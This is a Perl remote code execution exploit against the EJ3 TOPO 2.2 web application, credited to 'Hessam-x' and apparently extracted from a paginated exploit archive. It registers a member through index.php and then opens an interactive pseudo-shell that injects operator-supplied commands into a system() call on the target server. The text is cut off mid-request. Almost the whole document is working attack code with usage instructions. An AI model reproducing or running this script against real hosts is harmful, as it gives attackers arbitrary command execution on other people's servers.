1 #!/usr/bin/perl
2 #
3 # EJ3 TOPO 2.2 Remote Code Execution Exploit
4 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5 # Note : This Exploit Just run TOPO 2.2
6 # IHST : www.Hackerz.Ir
7 # AST : www.aria−security.net
8 ###### (C)oded & Discovered By Hessam−x
9
10 use LWP::UserAgent;
11 use LWP::Simple;
12 use HTTP::Cookies;
13
14
15 $host = $ARGV[0];
16
17 $url = "http://".$host;
18
19 &hed;
20 print " [~] Host : $host \n";
21 print " [~] Conecting ...\n";
22
23
24 $xpl = LWP::UserAgent−>new() or die;
25 $cookie_jar = HTTP::Cookies−>new();
26 $xpl−>cookie_jar( $cookie_jar );
27
28 $res = $xpl−>post($url.’index.php’,
29 Content => [
30 "email" => "info@yahoo.com",
31 "web" => "Yahoo.Com",
32 "webURL" => "http://www.yahoo.com",
33 "BannerURL" => "http://www.yahoo.com/logo.jpg",
34 "descripcion" => "YAHOO!INC",
35 "country" => "as",
36 "m" => "members",
37 "s" => "html",
38 "t" => "join",
39 "paso" => "2",
40 "ID" => "shell",
41 ],);
42
43 print " [+] Created a user ...\n";
44 &run;
45
46
47
48 sub hed()
49 {
50 print q(
51 ###########################################################
52 # EJ3 TOPO <= 2.1 Remote Code Execution Exploit #
Page 1/3
EJ3 TOPo 2.2 descripcion Remote Command Execution Exploit
Hessam−x
07/10/2006
53 # #
54 ############# Coded & discovered By Hessam−x ##############
55
56 );
57
58
59 if (@ARGV < 1) {
60 print " # usage : hx.pl [host&path]\n";
61 print " # E.g : hx.pl www.milw0rm.com/toplist/\n";
62 exit();
63 }
64
65 }
66
67 while ()
68 {
69 &run
70 }
71 sub run()
72 {
73
74 print "\n[Shell]\$";
75 chomp($exc=<STDIN>);
76
77 exit() if ($exc eq ’exit’);
78
79
80
81 $commd = "system(\"$exc\")";
82 $cmd = ’echo 1 ; echo _START_ ; ’.$commd.’ ; echo _END_’;
83
84
85 $req = $xpl−>post($url.’index.php’,
86 Content => [
87 "passwordNEW" => "0",
88 "email" => "info@yahoo.com",
89 "webURL" => "http://www.yaho